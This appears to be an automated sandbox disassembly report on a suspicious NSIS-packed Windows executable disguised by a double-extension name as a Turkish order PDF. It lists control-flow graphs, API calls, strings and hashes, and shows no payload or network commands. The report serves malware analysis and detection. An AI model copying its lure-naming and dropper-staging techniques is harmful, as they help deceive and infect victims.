40350b-40350e 56->64 57->36 65 403576-403584 call 406284 57->65 58->39 58->54 67 403589 59->67 74 4036c4 60->74 79 403682-40368c 61->79 80 403636-40366b 61->80 63->49 64->49 64->63 65->67 67->29 74->54 77 403882-40388a 75->77 78 403806-40381c GetCurrentProcess OpenProcessToken 75->78 85 403890-403894 ExitProcess 77->85 86 40388c 77->86 82 403852-403860 call 40665e 78->82 83 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 78->83 87 4036f4-403708 call 405855 lstrcatW 79->87 88 40368e-40369c call 405c61 79->88 84 40366d-403671 80->84 102 403862-40386c 82->102 103 40386e-403879 ExitWindowsEx 82->103 83->82 91 403673-403678 84->91 92 40367a-40367e 84->92 86->85 100 403715-40372f lstrcatW lstrcmpiW 87->100 101 40370a-403710 lstrcatW 87->101 88->54 99 40369e-4036b4 call 406284 * 2 88->99 91->92 97 403680 91->97 92->84 92->97 97->79 99->60 100->54 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->77 103->106 108 403736-40373b call 4057bb 105->108 109 40373d call 405838 105->109 106->77 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->54 138->126
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 0040337C
                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000020,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow$C:\Users\user\Desktop$C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 3441113951-1489103699
                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                  Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 148 405691-405695 146->148 149 40563d-405643 146->149 151 405656-40565f call 404262 147->151 152 40561d-40562c ShowWindow * 2 call 404230 147->152 148->151 157 405697-40569d 148->157 153 405645-405651 call 4041d4 149->153 154 40566b-40567b ShowWindow 149->154 160 405664-405668 151->160 152->146 153->151 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->151 165 40569f-4056b2 SendMessageW 157->165 161->148 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: {$6B
                                                                  • API String ID: 590372296-3705917127
                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                  Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 499 405996-4059bc call 405c61 502 4059d5-4059dc 499->502 503 4059be-4059d0 DeleteFileW 499->503 504 4059de-4059e0 502->504 505 4059ef-4059ff call 406284 502->505 506 405b52-405b56 503->506 507 405b00-405b05 504->507 508 4059e6-4059e9 504->508 512 405a01-405a0c lstrcatW 505->512 513 405a0e-405a0f call 405ba5 505->513 507->506 511 405b07-405b0a 507->511 508->505 508->507 514 405b14-405b1c call 4065c7 511->514 515 405b0c-405b12 511->515 516 405a14-405a18 512->516 513->516 514->506 523 405b1e-405b32 call 405b59 call 40594e 514->523 515->506 519 405a24-405a2a lstrcatW 516->519 520 405a1a-405a22 516->520 522 405a2f-405a4b lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a51-405a59 522->524 525 405af5-405af9 522->525 539 405b34-405b37 523->539 540 405b4a-405b4d call 4052ec 523->540 528 405a79-405a8d call 406284 524->528 529 405a5b-405a63 524->529 525->507 527 405afb 525->527 527->507 541 405aa4-405aaf call 40594e 528->541 542 405a8f-405a97 528->542 533 405a65-405a6d 529->533 534 405ad8-405ae8 FindNextFileW 529->534 533->528 538 405a6f-405a77 533->538 534->524 537 405aee-405aef FindClose 534->537 537->525 538->528 538->534 539->515 543 405b39-405b48 call 4052ec call 40604a 539->543 540->506 552 405ad0-405ad3 call 4052ec 541->552 553 405ab1-405ab4 541->553 542->534 544 405a99-405aa2 call 405996 542->544 543->506 544->534 552->534 556 405ab6-405ac6 call 4052ec call 40604a 553->556 557 405ac8-405ace 553->557 556->534 557->534
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059BF
                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A07
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A30
                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A40
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00405996
                                                                  • \*.*, xrefs: 00405A01
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-4258389565
                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                  Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                  Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D2
                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: 8gB
                                                                  • API String ID: 2295610775-1733800166
                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                  Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 194 403ed3-403ee8 191->194 195 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->195 192->191 193 403d46-403d4f 192->193 196 403d51-403d5e SetWindowPos 193->196 197 403d64-403d67 193->197 199 403f28-403f2d call 404247 194->199 200 403eea-403eed 194->200 195->194 196->197 202 403d81-403d87 197->202 203 403d69-403d7b ShowWindow 197->203 208 403f32-403f4d 199->208 205 403f20-403f22 200->205 206 403eef-403efa call 401389 200->206 209 403da3-403da6 202->209 210 403d89-403d9e DestroyWindow 202->210 203->202 205->199 207 4041c8 205->207 206->205 221 403efc-403f1b SendMessageW 206->221 216 4041ca-4041d1 207->216 214 403f56-403f5c 208->214 215 403f4f-403f51 call 40140b 208->215 219 403da8-403db4 SetWindowLongW 209->219 220 403db9-403dbf 209->220 217 4041a5-4041ab 210->217 224 403f62-403f6d 214->224 225 404186-40419f DestroyWindow EndDialog 214->225 215->214 217->207 223 4041ad-4041b3 217->223 219->216 226 403e62-403e70 call 404262 220->226 227 403dc5-403dd6 GetDlgItem 220->227 221->216 223->207 229 4041b5-4041be ShowWindow 223->229 224->225 230 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 224->230 225->217 226->216 231 403df5-403df8 227->231 232 403dd8-403def SendMessageW IsWindowEnabled 227->232 229->207 260 403fc2-403fc7 230->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 230->261 233 403dfa-403dfb 231->233 234 403dfd-403e00 231->234 232->207 232->231 237 403e2b-403e30 call 4041d4 233->237 238 403e02-403e08 234->238 239 403e0e-403e13 234->239 237->226 241 403e49-403e5c SendMessageW 238->241 242 403e0a-403e0c 238->242 239->241 243 403e15-403e1b 239->243 241->226 242->237 246 403e32-403e3b call 40140b 243->246 247 403e1d-403e23 call 40140b 243->247 246->226 256 403e3d-403e47 246->256 258 403e29 247->258 256->258 258->237 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->208 280 40409b-40409d 269->280 280->208 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->217 285 4040e0-40410d CreateDialogParamW 282->285 283->207 284 4040b5-4040bb 283->284 284->208 286 4040c1 284->286 285->217 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->217
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
